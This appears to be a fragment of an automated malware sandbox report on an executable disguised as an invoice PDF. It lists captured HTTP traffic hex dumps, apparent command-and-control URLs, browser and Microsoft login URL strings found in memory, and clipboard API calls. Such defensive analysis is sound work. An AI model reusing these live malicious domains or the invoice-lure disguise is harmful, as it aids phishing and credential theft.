20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.dlion.net Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.19.3.1Date: Tue, 10 Dec 2024 15:25:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Cache: MISS from kangle web serverContent-Encoding: gzipData Raw: 32 32 30 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ad 53 4d 8f d3 30 10 3d d3 5f 61 22 81 bb 5a 25 ee f6 63 59 5a c7 1c 90 e0 82 56 08 76 cf c8 8d a7 89 d9 34 0e 13 37 4b ff 3d 33 89 4a 11 f4 48 0e 71 e2 bc bc 37 ef cd 58 57 71 5f 9b 89 ae c0 3a 33 79 a1 f7 10 ad a8 62 6c 53 f8 71 f0 7d 9e bc 0f 4d 84 26 a6 0f c7 16 12 51 8c 6f 79 12 e1 67 54 fc ef 46 14 95 c5 0e 62 fe f8 f0 21 bd 4b 98 24 fa 58 83 59 ce 96 5a 8d 8f 13 ad 46 01 bd 0d ee 48 72 ce f7 c2 bb 5c ee ad 6f a4 b8 74 11 c8 1b 5d cd cd d7 40 35 55 be 29 05 20 06 5c 13 d5 dc 68 e5 09 d0 12 60 31 ea d0 ca cf 7a 47 05 52 95 75 c0 5c 22 38 69 ee 83 e8 0e 45 25 76 be 06 11 50 38 8f 50 c4 80 c7 4c 2b 06 13 15 ff a7 da 81 ef 73 0d b6 03 b2 04 c5 13 a3 35 85 81 b0 cb e5 77 db db ae 40 df c6 75 1d 0a 1b 7d 68 32 84 3a 58 37 bd 92 26 e2 51 d8 92 bc 68 65 8d a8 6d 04 24 7a a6 24 a3 a6 0a 5d 6c ec 1e d6 e2 c9 36 25 95 f1 0c 5b d1 01 f6 80 5a 31 40 57 38 42 87 4c da ad 34 1f a1 01 24 1a 27 b6 c7 8b 45 9c 23 eb 2d 92 61 07 39 e5 fd 57 94 66 d4 53 8b 6c 95 cd 6f b2 9b 5b 2e 2f a3 66 b0 e8 ef 65 b4 45 55 37 e5 c1 96 f0 a7 57 49 dd 64 7e 8a 00 10 50 e4 02 ba c2 b6 30 75 a1 38 ec 69 2c 28 03 fa 42 9f ae 36 23 f2 80 f5 05 d4 e3 97 4f 27 c0 be 2b 09 20 ef c3 ab f9 8c 1b 43 0b b7 86 96 80 74 3b b7 47 6e 26 6c 92 e5 4f 01 e6 f2 9f 00 09 35 54 08 3d 55 f3 8d 47 ea b4 63 c7 8b c4 a6 52 93 47 79 2d a9 7b 67 9b c9 b9 a5 89 e8 b0 c8 13 1e fb 6e ad d4 30 67 d9 28 45 ad ca 1a 88 ea dd 29 e2 d7 7d 95 af de 2e 97 cb 55 42 53 c3 bc e2 5a 30 b3 91 64 71 d8 e1 97 89 7e 99 a6 a2 b5 ce f1 e4 ee 68 94 3c 88 34 35 ff 65 7b 24 bf 7d b3 b8 9b cd 8a 1d d3 92 f0 70 b2 68 98 f9 3c ff 02 63 82 3d 3b d6 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 220SM0=_a"Z%cYZVv47K=3JHq7XWq_:3yblSq}M&QoygTFb!K$XYZFHr\ot]@5U) \h`1zGRu\"8iE%vP8PL+s5w@u}h2:X7&Qhem$z$]l6%[Z1@W8BL4$'E#-a9WfSlo[./feEU7WId~P0u8i,(B6#O'+ Ct;Gn&lO5T=UGcRGy-{gn0g(E)}.UBSZ0dq~h<45e{$}ph<c=;0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.19.3.1Date: Tue, 10 Dec 2024 15:25:56 GMTContent-Type: text/html; charset=utf-8Content-Length: 982Connection: closeX-Cache: MISS from kangle web serverData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 27 6d 61 69 6e 27 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 3c 69 3e 3c 68 32 3e 53 6f 6d 65 74 68 69 6e 67 20 65 72 72 6f 72 3a 3c 2f 68 32 3e 3c 2f 69 3e 0a 3c 70 3e 3c 68 33 3e 34 30 34 3c 2f 68 33 3e 3c 68 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 27 72 65 64 27 3e 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 2e 3c 2f 66 6f 6e 74 3e 3c 2f 68 33 3e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 6f 72 20 3c 61 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 27 3e 74 72 79 20 61 67 61 69 6e 3c 2f 61 3e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 64 69 76 3e 68 6f 73 74 6e 61 6d 65 3a 20 6b 61 6e 67 6c 65 20 77 65 62 20 73 65 72 76 65 72 3c 2f 64 69 76 3e 3c 68 72 3e 0a 3c 64 69 76 20 69 64 3d 27 70 62 27 3e 47 65 6e 65 72 61 74 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 6f 64 65 3d 34 30 34 27 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 6b 61 6e 67 6c 65 2f 33 2e 35 2e 32 31 2e 31 36 3c 2f 61 3e 2e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 27 6a 61 76 61 73 63 72 69 70 74 27 3e 0a 09 76 61 72 20 72 65 66 65 72 65 72 20 3d 20 65 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 09 76 61 72 20 75 72 6c 20 3d 20 65 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 55 52 4c 29 3b 0a 09 76 61 72 20 6d 73 67 20 3d 20 27 4e 6f 25 32 30 73 75 63 68 25 32 30 66 69 6c 65 25 32 30 6f 72 25 32 30 64 69 72 65 63 74 6f 72 79 2e 27 3b 0a 20 20 20 20 76 61 72 20 68 6f 73 74 6e 61 6d 65 3d 27 6b 61 6e 67 6c 65 20 77 65 62 20 73 65 72 76 65 72 27 3b 0a 09 76 61 72 20 65 76 65 6e 74 5f 69 64 3d 27 27 3b 0a 09 76 61 72 20 61 61 61 61 61 61 61 20 3d 20 28 27 3c 73 63 72 27 2b 27 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 65 72 72 6f 72 2e 6b 61 6e 67 6c 65 77 65 62 2e 6e 65 74 2f 3f 63 6f 64 65 3d 34 30 34 26 76 68 3d 35 39 34 34 34 35 22 3e 3c 2f 73 63 72 27 20 2b 20 27 69 70 74 3e 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 15:26:32 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 29 2a bf 74 fd c0 72 6e 78 cf 84 7f 9b b3 95 e1 18 37 a6 d7 05 e0 a6 31 7f fb 66 65 06 46 67 b6 34 3c df 0c f4 ee bf ff fa fd 60 d4 0d ef 3a c6 ca d4 bb b7 96 79 b7 76 bd 00 d0 bb 4e 60 3a 50 ea ce 9a 07 4b 7d 6e de 5a 33 73 40 7e 70 96 63 05 96 61 0f fc 99 61 9b ba 98 05 e1 b9 d7 6e e0 a7 00 38 ae e5 cc cd 8f 50 2a b0 02 db 7c fb cf ff e3 7f fe 6f ff f3 7f fd e7 7f fd f3 ff fd e7 ff fd 3f ff f7 7f fe 57 07 2e fe c7 a9 73 ed af a7 70 f5 5f ff fc 7f fe f9 7f fd f3 7f e0 d5 9b 33 5a e1 8d 1f dc db 66 67 65 ce 2d 43 ef 1a b6 dd 7d 7b f6 cd c9 37 9f fb df c9 37 ff f8 aa d3 41 3a 3a 33 df ef f0 67 8e 3b 37 af 56 ee 7c 63 9b fe 19 dc 1a d8 ae 31 37 bd 33 c2 3e fe 37 ff fc 7c 66 bb 8e 39 ff 2b 14 78 6f 06 03 8d df f8 e6 85 78 79 92 ab ba 06 21 48 55 f7 bd 59 0c 22 5f 14 fe c5 e5 e6 96 1f 9c cd 7e f3 69 b1 6b 73 75 76 6d bb b3 0f 3e 1f c9 df d9 35 c8 de 4d f4 c5 63 dd 0e d2 01 54 fc e3 b9 99 d9 fa ef ec 2b 9e d2 f5 00 7c 58 db c6 fd 64 61 9b 1f a7 f8 31 98 5b 9e 39 0b 2c d7 99 cc 5c 7b b3 72 a6 64 18 4c 44 41 f8 7a ba b2 1c 3a 2a 26 b2 24 ac 3f 4e 97 a6 75 b3 0c e8 b3 b5 31 9f c3 68 9c a8 c3 f5 c7 8e d0 11 a6 2b c3 bb b1 9c 89 30 05 38 ae 37 f9 17 59 53 e0 ff e9 02 86 ca 44 94 a0 d0 8f 30 66 3c ee 5b 0f 46 17 f7 83 69 df 9a 81 35 33 3a 3f 99 1b 33 f9 c9 7d ef 99 e6 7b c3 f1 39 1f 3e 06 30 f6 ad c5 f4 da 98 7d b8 f1 dc 8d 33 9f fc cb 62 b1 98 0e ee cc eb 0f 56 30 08 8c f5 60 09 2d b2 b1 55 03 8a 36 f0 a0 de da f0 60 74 6e 51 e9 4c 1c 37 e8 f1 29 45 d3 ef 44 bc 70 41 ad 2c 6c f7 6e f0 71 b2 b4 e6 73 d3 d9 fe 81 0c c3 4e 2f a1 5b 14 24 65 fd b1 ff 90 86 50 03 60 1b 3e ba 42 d5 77 05 cd f8 00 2c 7a 40 70 09 eb 6e 97 d9 52 a6 e7 b9 1e 05 18 f1 54 d8 d1 f4 ab 95 e9 6c 06 58 18 3b 0e 9e cf cd 39 d7 bc ca c0 98 61 99 08 ed 20 70 d7 80 ba 19 13 ca e0 e6 00 6e 1b 36 41 44 59 3b 40 33 ca c9 db 25 15 99 d2 a9 11 30 1e 6b d0 aa 1d 4c 86 27 d6 e2 7e 70 ed b9 77 20 ba 57 b7 96 6f 5d db 59 98 aa d2 98 b8 1d 6d 2a e5 07 6b 4b 92 ce 71 af 2d db 1c 44 32 7d 45 25 9a 8b 1e fb 9b 6b 64 f1 95 bb 36 41 4b c7 a2 1f 09 fe 0e be 5c 2d 5c 17 06 ff 60 ee de 39 3b 05 b5 bc 21 3b 6a 55 b5 2f 24 bc a9 38 ed 02 d7 58 3c 4b 89 2a 81 cb 5b 49 b7 47 ca 9a 4c 55 db 32 5e 3e a0 0a 9f 88 a0 7f 8d 4d e0 4e f3 bd 92 02 96 ad 96 d5 48 5f 37 a5 26 03 ab 84 86 92
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 29 2a bf 74 fd c0 72 6e 78 cf 84 7f 9b b3 95 e1 18 37 a6 d7 05 e0 a6 31 7f fb 66 65 06 46 67 b6 34 3c df 0c f4 ee bf ff fa fd 60 d4 0d ef 3a c6 ca d4 bb b7 96 79 b7 76 bd 00 d0 bb 4e 60 3a 50 ea ce 9a 07 4b 7d 6e de 5a 33 73 40 7e 70 96 63 05 96 61 0f fc 99 61 9b ba 98 05 e1 b9 d7 6e e0 a7 00 38 ae e5 cc cd 8f 50 2a b0 02 db 7c fb cf ff e3 7f fe 6f ff f3 7f fd e7 7f fd f3 ff fd e7 ff fd 3f ff f7 7f fe 57 07 2e fe c7 a9 73 ed af a7 70 f5 5f ff fc 7f fe f9 7f fd f3 7f e0 d5 9b 33 5a e1 8d 1f dc db 66 67 65 ce 2d 43 ef 1a b6 dd 7d 7b f6 cd c9 37 9f fb df c9 37 ff f8 aa d3 41 3a 3a 33 df ef f0 67 8e 3b 37 af 56 ee 7c 63 9b fe 19 dc 1a d8 ae 31 37 bd 33 c2 3e fe 37 ff fc 7c 66 bb 8e 39 ff 2b 14 78 6f 06 03 8d df f8 e6 85 78 79 92 ab ba 06 21 48 55 f7 bd 59 0c 22 5f 14 fe c5 e5 e6 96 1f 9c cd 7e f3 69 b1 6b 73 75 76 6d bb b3 0f 3e 1f c9 df d9 35 c8 de 4d f4 c5 63 dd 0e d2 01 54 fc e3 b9 99 d9 fa ef ec 2b 9e d2 f5 00 7c 58 db c6 fd 64 61 9b 1f a7 f8 31 98 5b 9e 39 0b 2c d7 99 cc 5c 7b b3 72 a6 64 18 4c 44 41 f8 7a ba b2 1c 3a 2a 26 b2 24 ac 3f 4e 97 a6 75 b3 0c e8 b3 b5 31 9f c3 68 9c a8 c3 f5 c7 8e d0 11 a6 2b c3 bb b1 9c 89 30 05 38 ae 37 f9 17 59 53 e0 ff e9 02 86 ca 44 94 a0 d0 8f 30 66 3c ee 5b 0f 46 17 f7 83 69 df 9a 81 35 33 3a 3f 99 1b 33 f9 c9 7d ef 99 e6 7b c3 f1 39 1f 3e 06 30 f6 ad c5 f4 da 98 7d b8 f1 dc 8d 33 9f fc cb 62 b1 98 0e ee cc eb 0f 56 30 08 8c f5 60 09 2d b2 b1 55 03 8a 36 f0 a0 de da f0 60 74 6e 51 e9 4c 1c 37 e8 f1 29 45 d3 ef 44 bc 70 41 ad 2c 6c f7 6e f0 71 b2 b4 e6 73 d3 d9 fe 81 0c c3 4e 2f a1 5b 14 24 65 fd b1 ff 90 86 50 03 60 1b 3e ba 42 d5 77 05 cd f8 00 2c 7a 40 70 09 eb 6e 97 d9 52 a6 e7 b9 1e 05 18 f1 54 d8 d1 f4 ab 95 e9 6c 06 58 18 3b 0e 9e cf cd 39 d7 bc ca c0 98 61 99 08 ed 20 70 d7 80 ba 19 13 ca e0 e6 00 6e 1b 36 41 44 59 3b 40 33 ca c9 db 25 15 99 d2 a9 11 30 1e 6b d0 aa 1d 4c 86 27 d6 e2 7e 70 ed b9 77 20 ba 57 b7 96 6f 5d db 59 98 aa d2 98 b8 1d 6d 2a e5 07 6b 4b 92 ce 71 af 2d db 1c 44 32 7d 45 25 9a 8b 1e fb 9b 6b 64 f1 95 bb 36 41 4b c7 a2 1f 09 fe 0e be 5c 2d 5c 17 06 ff 60 ee de 39 3b 05 b5 bc 21 3b 6a 55 b5 2f 24 bc a9 38 ed 02 d7 58 3c 4b 89 2a 81 cb 5b 49 b7 47 ca 9a 4c 55 db 32 5e 3e a0 0a 9f 88 a0 7f 8d 4d e0 4e f3 bd 92 02 96 ad 96 d5 48 5f 37 a5 26 03 ab 84 86 92
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.00000000053F8000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000006888000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://premium303max.rest/p39a/?Pt=fDlHoNWP0RBd&UTJ0bhC=NYM041vNjejJmgmdhSmYVhxa0
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4507703675.0000000006522000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.locuramagica.online
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4507703675.0000000006522000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.locuramagica.online/rls3/
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004F42000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.00000000063D2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://error.kangleweb.net/?code=404&vh=594445
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=parked
                Source: xwizard.exe, 00000005.00000002.4501845196.0000000003233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/o
                Source: xwizard.exe, 00000005.00000003.2528778267.000000000325F000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.0000000003233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: xwizard.exe, 00000005.00000003.2528778267.000000000325F000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.0000000003233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: xwizard.exe, 00000005.00000003.2528778267.000000000325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: xwizard.exe, 00000005.00000002.4501845196.0000000003233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: xwizard.exe, 00000005.00000002.4501845196.0000000003233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: xwizard.exe, 00000005.00000002.4501845196.0000000003233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: xwizard.exe, 00000005.00000003.2527902409.000000000813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
